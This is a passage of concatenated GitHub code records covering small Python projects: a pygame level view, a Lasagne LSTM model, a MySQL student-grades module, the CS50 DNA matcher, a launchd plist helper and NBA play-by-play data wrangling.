Naciśnij Esc by spróbować ponownie.\", int(0.04 * self._surfaceSize[0]), (0.05 * self._surfaceSize[0], 0.05 * self._surfaceSize[1]))\n self.__blink_enabled = 1\n\n self.__blinking_rects = []\n self.__blinking_rects.append(BlinkingRect(8, (0.01 * self._surfaceSize[0], 0.5 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n self.__blinking_rects.append(BlinkingRect(10, (0.5 * self._surfaceSize[0], 0.01 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n self.__blinking_rects.append(BlinkingRect(12, (0.97 * self._surfaceSize[0], 0.5 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n self.__blinking_rects.append(BlinkingRect(15, (0.5 * self._surfaceSize[0], 0.96 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n\n def render(self):\n self._surface.fill((200, 220, 250))\n if self.__paused == True:\n self.__pause_text.draw(self._surface)\n elif self.__gameover == True and self.__won == True:\n self.__won_text.draw(self._surface)\n elif self.__gameover == True and self.__won == False:\n self.__lost_text.draw(self._surface)\n else:\n for entity in self.__all_sprites:\n self._surface.blit(entity.surf, (entity.get_x() - self.__camera.x, entity.get_y() - self.__camera.y))\n if self.__blink_enabled == 1:\n for rect in self.__blinking_rects:\n rect.update();\n rect.draw(self._surface)\n #self._surface.blit(self.__player.get_surf(), self.__player.get_rect())\n\n py.display.flip()\n\n #v----GETTERY----v\n def set_player(self, player):\n self.__player = player\n\n def set_all_sprites(self, all_sprites):\n self.__all_sprites = all_sprites\n\n def set_paused(self, paused):\n self.__paused = paused\n\n def set_gameover(self, gameover):\n self.__gameover = gameover\n\n def set_won(self, won):\n self.__won = won\n\n def set_camera(self, camera):\n self.__camera = camera\n\n def set_blink_enabled(self, do_we_blink):\n self.__blink_enabled = do_we_blink","repo_name":"anmach/PProjektinator","sub_path":"PProjektinator 7000/Game/src/view/viewLevel.py","file_name":"viewLevel.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12545433622","text":"import aioredis\nfrom tg_simple_math_bot.settings import Settings\n\ndef log_commands(func):\n async def wrapper(*args, **kwargs):\n key = str(kwargs.get(\"chat_id\") or (args[1] if len(args) > 1 else None))\n value = str(kwargs.get(\"command\") or (args[2] if len(args) > 2 else None))\n res = await func(*args, **kwargs)\n await redis_lpush(key, value)\n return res\n return wrapper\n\n\nasync def redis_lpush(key, value):\n redis = aioredis.from_url(Settings.REDIS_DSN)\n await redis.lpush(key, value)\n","repo_name":"amakridin/simple_calc_bot","sub_path":"tg_simple_math_bot/services/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38408277295","text":"import numpy as np\nimport theano\nimport theano.tensor as T\nimport lasagne\nfrom lasagne.layers import *\nfrom lasagne.updates import *\nfrom lasagne.nonlinearities import *\n\ndef Model(struct, seqlen):\n inp = InputLayer((None, seqlen, struct[0]))\n l = inp\n for s in struct:\n l = LSTMLayer(l, num_units=s, unroll_scan=False, precompute_input=True)\n l_shp = ReshapeLayer(l, (-1, struct[-1]))\n l_dense = DenseLayer(l_shp, 
num_units=struct[0], nonlinearity=linear)\n l_out = ReshapeLayer(l_dense, (-1, seqlen, struct[0]))\n return inp, l_out\n\nclass Batcher:\n def __init__(self, batch_dim, train_percentage=90):\n from Utilities.Sound import get_sound, sound_cut\n from Utilities.Pretreatment import Normalize\n data = sound_cut(get_sound(\"XqaJ2Ol5cC4\").astype(np.float32))\n cut = data.shape[0]*train_percentage//100\n self.pre = Normalize()\n self.pre.fit(data)\n self.train_data = self.pre.cmp(data[:cut])\n self.valid_data = self.pre.cmp(data[cut:])\n self.batch_dim = batch_dim\n self.n_batch = 0\n self.train_max = self.train_data.shape[0]-batch_dim[0]-batch_dim[1]*batch_dim[2]-1\n self.starts = np.arange(0, self.train_max-batch_dim[2], batch_dim[0])\n np.random.shuffle(self.starts)\n \n def get_batch(self):\n self.n_batch += 1\n batch_dim = self.batch_dim\n start = self.starts[self.n_batch%self.starts.shape[0]]\n x_data = np.asarray([self.train_data[start+i:start+i+batch_dim[1]*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n y_data = np.asarray([self.train_data[start+i+batch_dim[2]:start+i+(batch_dim[1]+1)*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n return x_data, y_data\n \n def get_valid_batch(self):\n batch_dim = self.batch_dim\n x_data = np.asarray([self.valid_data[i:i+batch_dim[1]*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n y_data = np.asarray([self.valid_data[i+batch_dim[2]:i+(batch_dim[1]+1)*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n return x_data, y_data\n \n def get_percentage(self):\n return 100*self.n_batch*self.batch_dim[0]//self.train_max\n \n def get_params(self):\n return self.n_batch\n \n def set_params(self, params):\n self.n_batch = params\n \nclass Curve:\n def __init__(self, train, valid, cost, clock):\n self.train = train\n self.valid = valid\n self.cost = cost\n self.clock = clock\n self.train_curve = []\n self.valid_curve = []\n self.clock_curve = []\n self.push()\n \n def push(self):\n self.train_curve += [self.cost(self.train[0], self.train[1])]\n self.valid_curve += [self.cost(self.valid[0], self.valid[1])]\n self.clock_curve += [self.clock()]\n \n def get_params(self):\n return [self.train_curve, self.valid_curve, self.clock_curve]\n \n def set_params(self, params):\n self.train_curve, self.valid_curve, self.clock_curve = params","repo_name":"duchesneaumathieu/IFT6266","sub_path":"Last try/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11336840904","text":"class Symbol:\n \"\"\"\n This is the Symbol class\n \"\"\"\n\n LOT_SIZE = \"lot_size\"\n TOP_3 = \"top_3\"\n OLD_OI = \"old_oi\"\n O_COST = \"o_cost\"\n COST = \"cost\"\n O_AVG = \"o_avg\"\n\n QTY = 'QTY'\n QTY_DELTA = 'D_QTY'\n TOP_3_DELTA = '% Top-3'\n O_COST_DELTA = '% O-Cost'\n COST_DELTA = '% Cost'\n AVG_DELTA = '% Avg'\n PRICE_DIFF = \"Diff\"\n\n TRADING_SYMBOL = \"trading_symbol\"\n INSTRUMENT_TOKEN = \"instrument_token\"\n EXCHANGE = \"exchange\"\n\n LAST_VOL = \"last_vol\"\n LAST_VOL_TIMESTAMP = \"last_vol_timestamp\"\n CURRENT_PRICE = \"Current\"\n LAST_AVG_PRICE = \"average_price\"\n NUMBER_OF_TICKS = \"total_hits\"\n\n def __init__(self, my_dict=None):\n\n self.name = None\n self.data = {\n self.LOT_SIZE: None, self.TOP_3: None, self.OLD_OI: None, self.O_COST: None, self.COST: None, self.O_AVG: None\n }\n\n self.zerodha_info 
= {\n self.TRADING_SYMBOL: None, self.INSTRUMENT_TOKEN: None, self.EXCHANGE: None,\n }\n\n self.curr_data = {\n self.LAST_VOL: 0, self.LAST_VOL_TIMESTAMP: None, self.CURRENT_PRICE: 0, self.LAST_AVG_PRICE: 0, self.NUMBER_OF_TICKS: 0\n }\n\n self.actionable = False\n\n if my_dict:\n for key in my_dict:\n setattr(self, key, my_dict[key])\n\n\n def __str__(self):\n return str({\n \"name\": self.name, \"data\": self.data, \"zerodha_info\": self.zerodha_info, \"curr_data\": self.curr_data, \"actionable\": self.actionable\n })\n\n def add_api_info(self, info):\n self.zerodha_info[self.TRADING_SYMBOL] = info[self.TRADING_SYMBOL]\n self.zerodha_info[self.INSTRUMENT_TOKEN] = info[self.INSTRUMENT_TOKEN]\n self.zerodha_info[self.EXCHANGE] = info[self.EXCHANGE]\n\n def gen_string_for_trade_xslx(self):\n data = self.data\n curr_data = self.curr_data\n\n if self.curr_data[self.LAST_VOL_TIMESTAMP] is None:\n return [data[self.OLD_OI],\n data[self.LOT_SIZE],\n data[self.TOP_3],\n data[self.O_COST],\n data[self.COST],\n data[self.O_AVG],\n self.name]\n\n return [curr_data[self.LAST_VOL_TIMESTAMP],\n data[self.OLD_OI],\n data[self.LOT_SIZE],\n data[self.TOP_3],\n data[self.O_COST],\n data[self.COST],\n data[self.O_AVG],\n self.name,\n curr_data[self.QTY_DELTA],\n curr_data[self.QTY],\n curr_data[self.TOP_3_DELTA],\n curr_data[self.O_COST_DELTA],\n curr_data[self.COST_DELTA],\n curr_data[self.AVG_DELTA],\n curr_data[self.LAST_AVG_PRICE],\n curr_data[self.PRICE_DIFF],\n \"Yes\" if self.actionable else \"\"]\n\n","repo_name":"kckanav/pollytrading","sub_path":"util/symbol.py","file_name":"symbol.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10319162797","text":"'''\nGood morning! 
Here's your coding interview problem for today.\n\nThis problem was recently asked by Google.\n\nGiven a list of numbers and a number k, return whether any two numbers from the list add up to k.\n\nFor example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.\n\nBonus: Can you do this in one pass?\n'''\n\ndef solution(nums, k):\n '''\n nums: list of integers\n k: value to be reached by summing any two elements in nums\n '''\n\n # For O(N^2) do this:\n for i in nums:\n for j in nums:\n if i+j == k:\n return True\n return False\n\ndef solution_eff(nums, k):\n '''\n nums: list of integers\n k: value to be reached by summing any two elements in nums\n '''\n # To obtain O(N) complexity, we can do this:\n\n nums = set(nums)\n for i in nums:\n if k-i in nums: return True\n return False\n\nprint(solution([10,15,3,7],10))\nprint(solution_eff([10,15,3,7],10))\n","repo_name":"flxsosa/CodingProblems","sub_path":"problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29470945954","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport plistlib\n\nUSER = 1\nUSER_ADMIN = 2\nDAEMON_ADMIN = 3\nUSER_OS = 4\nDAEMON_OS = 5\n\nPLIST_LOCATIONS = {\n USER: \"~/Library/LaunchAgents\", # Per-user agents provided by the user.\n USER_ADMIN: \"/Library/LaunchAgents\", # Per-user agents provided by the administrator.\n DAEMON_ADMIN: \"/Library/LaunchDaemons\", # System-wide daemons provided by the administrator.\n USER_OS: \"/System/Library/LaunchAgents\", # Per-user agents provided by Mac OS X.\n DAEMON_OS: \"/System/Library/LaunchDaemons\", # System-wide daemons provided by Mac OS X.\n}\n\n\ndef compute_directory(scope):\n return os.path.expanduser(PLIST_LOCATIONS[scope])\n\n\ndef compute_filename(label, scope):\n return os.path.join(compute_directory(scope), label + \".plist\")\n\n\ndef discover_filename(label, scopes=None):\n \"\"\"\n Check the filesystem for the existence of a .plist file matching the job label.\n Optionally specify one or more scopes to search (default all).\n\n :param label: string\n :param scope: tuple or list or oneOf(USER, USER_ADMIN, DAEMON_ADMIN, USER_OS, DAEMON_OS)\n \"\"\"\n if scopes is None:\n scopes = list(PLIST_LOCATIONS)\n elif not isinstance(scopes, (list, tuple)):\n scopes = (scopes, )\n for thisscope in scopes:\n plistfilename = compute_filename(label, thisscope)\n if os.path.isfile(plistfilename):\n return plistfilename\n return None\n\n\ndef read(label, scope=None):\n with open(discover_filename(label, scope), \"rb\") as f:\n return plistlib.load(f)\n\n\ndef write(label, plist, scope=USER):\n \"\"\"\n Write the property list to file on disk and return filename.\n\n Creates the underlying parent directory structure if missing.\n :param plist: dict\n :param label: string\n :param scope: oneOf(USER, USER_ADMIN, DAEMON_ADMIN, USER_OS, DAEMON_OS)\n \"\"\"\n os.makedirs(compute_directory(scope), mode=0o755, exist_ok=True)\n fname = compute_filename(label, scope)\n with open(fname, \"wb\") as f:\n plistlib.dump(plist, f)\n return fname\n","repo_name":"infothrill/python-launchd","sub_path":"launchd/plist.py","file_name":"plist.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"99"} +{"seq_id":"26394470965","text":"import mysql.connector\nfrom mysql.connector import Error\nimport classes as clss\n\n\n\ndef connection_open():\n connection = 
mysql.connector.connect(host='localhost',\n database='mydb',\n user='root',\n password='dusan')\n if connection.is_connected():\n cursor = connection.cursor()\n return cursor, connection\n\ndef connection_close(cursor, connection):\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\n\n\n\n\n#Unosenje osnovnih podataka\n\n\ndef unesi_studenta(student):\n\n cursor,connection = connection_open();\n data = (student.ime, student.prezime)\n query = \"INSERT INTO student (student_Ime, student_prezime) VALUES ( %s, %s)\"\n try:\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef unesi_predmet(predmet):\n \n cursor, connection = connection_open()\n\n data = (predmet.naziv, predmet.broj_ESPB)\n query = \"INSERT INTO predmet (naziv_predmeta, broj_ESPB_bodova) VALUES (%s, %s)\"\n try:\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef unesi_profesora(profesor):\n\n cursor,connection = connection_open()\n data = (profesor.ime, profesor.prezime)\n query = \"INSERT INTO profesor (profesor_ime, profesor_prezime) VALUES (%s, %s)\"\n try:\n #upisivanje profesora u bazu\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\ndef unesi_ispit(ispit):\n\n cursor, connection = connection_open()\n query = \"INSERT INTO ispit (predmet_idpredmet, profesor_idprofesor, datum) VALUES (%s, %s, %s)\"\n data = ( ispit.profesor.id, ispit.predmet.id, ispit.datum)\n \n try:\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\n\n\n\n\n\n\n\n\n\n\n# ZASO U OVOJ METODI UZIMAMO I PREDMETID I STUDENTID????\n\ndef get_predmet_i_student_id(student, predmet):\n\n cursor, connection = connection_open()\n query_student = \"SELECT idStudent FROM student WHERE student_ime = %s AND student_prezime LIKE %s\"\n querry_predemt = \"SELECT idPredmet FROM predmet WHERE naziv_predmeta LIKE %s AND broj_ESPB_bodova LIKE %s\"\n try:\n # uzizamo id studenta \n cursor.execute(query_student,(student.ime, student.prezime))\n student_id = cursor.fetchall()\n # uzizamo id predmeta\n cursor.execute(querry_predemt, (predmet.naziv, predmet.broj_ESPB))\n predmet_id = cursor.fetchall()\n # Iz nekog razloga dobijam listu u nizu pa moram ovako da vracam vrednosti \n \n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n # Iz nekog razloga dobijam listu u nizu pa moram ovako da vracam vrednosti\n return (student_id[0][0], predmet_id[0][0])\n \n\ndef upis_na_predmet(student, predmet):\n\n ids = get_predmet_i_student_id(student, predmet)\n cursor,connection = connection_open()\n query = \"INSERT INTO student_has_predmet (student_idStudent, predmet_idPredmet) VALUES (%s, %s)\"\n try:\n cursor.execute(query, (ids[0], ids[1]))\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef get_predmet(predmet_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM predmet WHERE idPredmet LIKE %s\"\n predmet = \"\"\n try:\n cursor.execute(query,(predmet_id,))\n predmet_list = cursor.fetchall()\n predmet = clss.predmet(predmet_list[0][1], predmet_list[0][2])\n \n except Error as e:\n print(\"Error: \", e)\n finally:\n 
connection_close(cursor, connection)\n return predmet\n\n\ndef get_profesor(profesor_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM profesor WHERE idProfesor LIKE %s\"\n profesor = \"\"\n try:\n cursor.execute(query, (profesor_id,))\n profesor_list = cursor.fetchall()\n profesor = clss.profesor(profesor_list[0][1], profesor_list[0][2])\n \n except Error as e:\n print(\"Erroer: \", e)\n finally:\n connection_close(cursor, connection)\n return profesor\n\ndef get_student(student_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FORM profesor WHERE idStudent LIKE %s\"\n try:\n cursor.execute(query, (student_id, ))\n student_list = cursor.fetchall()\n student = clss.pstudent(student_list[0][1], student_list[0][2])\n \n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n return student\n \ndef get_ispit(ispit_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM ispit WHERE idispit LIKE %s\"\n ispit_raw = \"\"\n\n try:\n cursor.execute(query, (ispit_id, ))\n ispit_raw = cursor.fetchall()\n \n except Error as e:\n print(\"Error: \", e)\n\n finally:\n connection_close(cursor, connection)\n return ispit_raw\n\n \n\ndef get_sve_studente():\n cursor, connection = connection_open()\n query = \"SELECT * FROM student\"\n\n try:\n cursor.execute(query)\n students = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n students_list = []\n \n for x in students:\n students_list.append(clss.student(x[0],x[1],x[2]))\n\n connection_close(cursor, connection)\n return students_list\n\n\ndef get_sve_profesore():\n cursor, connection = connection_open()\n query = \"SELECT * FROM profesor\"\n\n try:\n cursor.execute(query)\n profesori = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n proffesor_list = []\n \n for x in profesori:\n proffesor_list.append(clss.profesor(x[0], x[1], x[2]))\n\n connection_close(cursor, connection)\n return proffesor_list\n\n\ndef get_sve_predmete():\n cursor, connection = connection_open()\n query = \"SELECT * FROM predmet\"\n\n try:\n cursor.execute(query)\n predmeti = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n predmet_list = []\n \n for x in predmeti:\n predmet_list.append(clss.predmet(x[0], x[1], x[2]))\n\n connection_close(cursor, connection)\n return predmet_list\n\n\n\ndef get_sve_ispite():\n cursor, connection = connection_open()\n query = \"SELECT * FROM ispit\"\n\n try:\n cursor.execute(query)\n ispiti = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n ispiti_list = []\n \n for x in ispiti:\n ispiti_list.append(clss.ispit(x[0],x[1],x[2]))\n\n connection_close(cursor, connection)\n return ispiti_list\n\n \n\ndef upis_ocene(student, ispit, ocena):\n\n cursor, connection = connection_open()\n query = \"INSERTI INTO student_hes_ispit (student_idstudent, ispit_idispit, ocena) VALUES (%s, %s, %s)\"\n data = (student.id, ispit.id, ocena)\n\n try:\n cursor.execute(query, data)\n connection.commit()\n\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef svi_ispiti_studenta(student):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM student_has_ispit WHERE student_idstudent LIKE %s\"\n data = (student.id, )\n ispiti = \"\"\n\n try:\n cursor.execute(query,data)\n ispiti = cursor.fetchall()\n\n except Error as e:\n print(\"Error: \", e)\n\n finally:\n connection_close(cursor, connection)\n \n for ispit in ispiti:\n print(ispit)\n\n return 
ispiti\n \n\n\n\n\n","repo_name":"QueensAnnsRevenge/pythnon-student-teacher-system","sub_path":"dataBase.py","file_name":"dataBase.py","file_ext":"py","file_size_in_byte":8020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21444012878","text":"# lazy, dumb solution\n\nwith open(\"input.txt\") as f:\n lines = f.readlines()\n\n# returns the number of differing characters and common characters joined to a string\n# works under the assumption that both strings are the same length\ndef difference(one, two):\n common_chars = [c1 for (c1, c2) in zip(one, two) if c1 == c2]\n\n return len(one) - len(common_chars), \"\".join(common_chars)\n\n# input is small enough that we can brute-force\none_off = [(l1, l2) for l1 in lines for l2 in lines if difference(l1, l2)[0] == 1]\n\nfirst = one_off[0][0]\nsecond = one_off[0][1]\n\nprint(difference(first, second)[1])\n","repo_name":"teschty/aoc2018","sub_path":"day_02/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33686245912","text":"import os\nimport spacy\n\n\nclass NERExtractSkills:\n def __init__(self, model):\n if os.path.exists(model):\n self.model_name = model\n self.nlp = spacy.load(model)\n else:\n raise \"{} file not exist!\".format(model)\n\n def extract_skills(self, text):\n document = self.nlp(text)\n return set(document.ents)\n\n\n\"\"\"def main():\n # model = NERModel(datafile=\"skill_label_data.json\")\n # model.train(epochs=40)\n # model.save_model()\n module1 = NERBasedSkills(model='ner_model')\n data_module = NERData(filename=\"skill_label_data.json\")\n text = data_module.get_training_data()\n print(module1.get_skills(text[0][0]))\n\n\nmain()\"\"\"\n","repo_name":"rawat999/Job_Recommedation","sub_path":"skill_extractor/ner_module/ner.py","file_name":"ner.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28742093163","text":"# Implement a program that identifies a person based on their DNA\nimport csv\nimport sys\n\ndef main():\n\n # Check for command-line usage\n if len(sys.argv) != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n sts.exit(1)\n\n # Read database file into a variable\n people = []\n sequences = []\n with open(sys.argv[1], 'r') as data:\n datareader = csv.DictReader(data)\n\n # Make a list of key values\n sequences = datareader.fieldnames[1:]\n\n for person in datareader:\n # Convert string to int\n for x in sequences:\n person[x] = int(person[x])\n people.append(person)\n\n # Read DNA sequence file into a variable\n sequence = []\n with open(sys.argv[2], 'r') as dna:\n dnareader = csv.reader(dna)\n for dna in dnareader:\n sequence.append(dna)\n\n # Find longest match of each STR in DNA sequence\n match_dict = {}\n for x in sequences:\n match_dict[x] = longest_match(sequence[0][0], x)\n\n # Check database for matching profiles\n for person in people:\n match = 0\n for x in sequences:\n if person[x] == match_dict[x]:\n match += 1\n # If all subsequences matched, print person's name\n if match == len(sequences):\n print(person[\"name\"])\n return\n\n print(\"No match\")\n return\n\n\ndef longest_match(sequence, subsequence):\n \"\"\"Returns length of longest run of subsequence in sequence.\"\"\"\n\n # Initialize variables\n longest_run = 0\n subsequence_length = len(subsequence)\n sequence_length = len(sequence)\n\n # 
Check each character in sequence for most consecutive runs of subsequence\n for i in range(sequence_length):\n\n # Initialize count of consecutive runs\n count = 0\n\n # Check for a subsequence match in a \"substring\" (a subset of characters) within sequence\n # If a match, move substring to next potential match in sequence\n # Continue moving substring and checking for matches until out of consecutive matches\n while True:\n\n # Adjust substring start and end\n start = i + count * subsequence_length\n end = start + subsequence_length\n\n # If there is a match in the substring\n if sequence[start:end] == subsequence:\n count += 1\n\n # If there is no match in the substring\n else:\n break\n\n # Update most consecutive matches found\n longest_run = max(longest_run, count)\n\n # After checking for runs at each character in seqeuence, return longest run found\n return longest_run\n\n\nmain()\n","repo_name":"SawakoSugimori/CS50","sub_path":"Week6 - Python/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"950110621","text":"import numpy as np\nfrom utils import print_city_map\nfrom utils import extract_coords\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\nfrom math import radians, cos, sin, asin, sqrt\nfrom filter_travel_journal import generate_pickled_travel_journal\n\n\n'''\n Select participants \n'''\nparticipant_a = 34\nparticipant_b = 922\n\ndef plot_at_work_locations(df, color, ax):\n global plotted_coordinates\n categories = {\n 'AtWork': 'Work',\n 'AtHome': 'Home',\n 'AtRestaurant': 'Restaurant',\n 'AtRecreation': 'Socialize'\n }\n\n threshold_distance = 200\n\n def is_close_to_plotted_coordinates(latitude, longitude):\n for plotted_latitude, plotted_longitude in plotted_coordinates:\n distance = sqrt((latitude - plotted_latitude)**2 + (longitude - plotted_longitude)**2)\n if distance < threshold_distance:\n return True\n return False\n\n for category, label in categories.items():\n category_df = df[df['currentMode'] == category]\n if category_df.shape[0] > 0:\n unique_latitudes = category_df['latitude'].unique()\n unique_longitudes = category_df['longitude'].unique()\n for latitude, longitude in zip(unique_latitudes, unique_longitudes):\n if (latitude, longitude) not in plotted_coordinates:\n if not is_close_to_plotted_coordinates(latitude, longitude):\n ax.text(latitude, longitude, label, fontsize=10, color='black', alpha=0.9)\n circle = plt.Circle((latitude, longitude), 50, color=color, fill=False)\n ax.add_patch(circle)\n plotted_coordinates.add((latitude, longitude))\n\ndef plot_travel_journeys(df, map, color):\n # Store the coordinates of the previous location\n prev_lat = None\n prev_long = None\n \n for index, row in df.iterrows():\n lat = row['latitude']\n long = row['longitude']\n\n if prev_lat is not None and prev_long is not None:\n\n # Plot a line between current and previous locations\n line = plt.Line2D([prev_lat, lat], [prev_long, long], color=color, alpha=0.25)\n map.add_artist(line)\n\n # Update previous location\n prev_lat = lat\n prev_long = long\n\n\nmax_retries = 2\nretry_count = 0\n\nwhile retry_count < max_retries:\n try:\n with open(f'{participant_a}_journeys.pickle', 'rb') as f:\n result_dict_a = pickle.load(f)\n break # File opened successfully, exit the loop\n except FileNotFoundError:\n if retry_count < max_retries - 1:\n print(f'Pickled file not found - generating new one for participant 
{participant_a}')\n generate_pickled_travel_journal(participant_a)\n retry_count += 1\n else:\n print(f'Failed to open pickled file after {max_retries} attempts. Aborting.')\n exit()\n # Handle the failure, raise an exception or exit the program\n\nretry_count = 0 # Reset the retry count for participant B\n\nwhile retry_count < max_retries:\n try:\n with open(f'{participant_b}_journeys.pickle', 'rb') as f:\n result_dict_b = pickle.load(f)\n break # File opened successfully, exit the loop\n except FileNotFoundError:\n if retry_count < max_retries - 1:\n print(f'Pickled file not found - generating new one for participant {participant_b}')\n generate_pickled_travel_journal(participant_b)\n retry_count += 1\n else:\n print(f'Failed to open pickled file after {max_retries} attempts. Aborting.')\n exit()\n # Handle the failure, raise an exception or exit the program\n\n# Get the participants apartment ids\ndf_participants_data = pd.read_csv('./csv/participant_data.csv')\n\n# Get the apartments location\ndf_apartments_locations = pd.read_csv('./csv/Apartments.csv')\n\ndf_buildins_locations = pd.read_csv('./csv/Buildings.csv')\n\n# Get the apartments location\ndf_apartments_locations['longitude'], df_apartments_locations['latitude'] = zip(*df_apartments_locations['location'].apply(extract_coords))\ndf_buildins_locations['longitude'], df_buildins_locations['latitude'] = zip(*df_buildins_locations['location'].apply(extract_coords))\n\napartment_id_a = df_participants_data.loc[df_participants_data['participantId'] == participant_a, 'apartmentId']\napartment_id_b = df_participants_data.loc[df_participants_data['participantId'] == participant_b, 'apartmentId']\n\n\napartment_location_a_lat = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_a.iloc[0], 'latitude']\napartment_location_a_long = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_a.iloc[0], 'longitude']\n\napartment_location_b_lat = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_b.iloc[0], 'latitude']\napartment_location_b_long = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_b.iloc[0], 'longitude']\n\ntitle = f'Participant {participant_a} (red) and {participant_b} (blue) travel journeys'\n\nfig, (ax3) = plt.subplots( figsize=(15, 8))\nax3 = print_city_map(ax3)\nax3.set_title(title)\n\nplotted_coordinates = set()\n\n# Access the data in the result_dict\nfor hash_id, stamps in result_dict_a.items():\n # Perform operations on the stamps data\n stamps['longitude'], stamps['latitude'] = zip(*stamps['currentLocation'].apply(extract_coords))\n color = 'red'\n plot_travel_journeys(stamps, ax3, color)\n plot_at_work_locations(stamps, color, ax3)\n\n\n# Access the data in the result_dict\nfor hash_id, stamps in result_dict_b.items():\n # Perform operations on the stamps data\n stamps['longitude'], stamps['latitude'] = zip(*stamps['currentLocation'].apply(extract_coords))\n color = 'blue'\n plot_travel_journeys(stamps, ax3, color)\n plot_at_work_locations(stamps, color, ax3)\n\n\n\nplt.show()\n\n\n\n","repo_name":"rikardv/avda","sub_path":"compare_participant_travels.py","file_name":"compare_participant_travels.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11571626731","text":"# Stat 6021 Final Project Data Wrangling\n# dylan greenleaf (djg3cg)\n\nimport numpy as np\nimport pandas as pd\nimport 
re\n\ngame_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014.csv\")\ngame_log.describe\ngame_log.EVENTNUM[1] #All data looks to have been properly imported\n\nshot_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAshots_2014.csv\")\nshot_log.describe\nshot_log.GAME_ID[1] #All data looks to have been properly imported\n\ngame_log.HOMEDESCRIPTION[1]\ngame_log.VISITORDESCRIPTION[1]\n\ngame_log[\"shot_or_not\"] = np.nan # Initialize new column in shot log where we can store 1 or 0 based on shot taken\n\ngame_log.shot_or_not[7]\ngame_log.HOMEDESCRIPTION[7]\ngame_log.VISITORDESCRIPTION[7]\n\n# test each observation to see if either description contains some reference to a shot being made\nfor i in range(0,len(game_log.shot_or_not)):\n if ('shot' in str(game_log.HOMEDESCRIPTION[i]).lower() or 'layup' in str(game_log.HOMEDESCRIPTION[i]).lower() or 'dunk' in str(game_log.HOMEDESCRIPTION[i]).lower()\n or 'shot' in str(game_log.VISITORDESCRIPTION[i]).lower() or 'layup' in str(game_log.VISITORDESCRIPTION[i]).lower() or 'dunk' in str(game_log.VISITORDESCRIPTION[i]).lower()):\n game_log.loc[i,'shot_or_not'] = 1\n else:\n game_log.loc[i,'shot_or_not'] = 0\n \n# write partially cleaned data set to file just in case program crashes\ngame_log.to_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_cleaning.csv\", index = False)\n\n\n# create 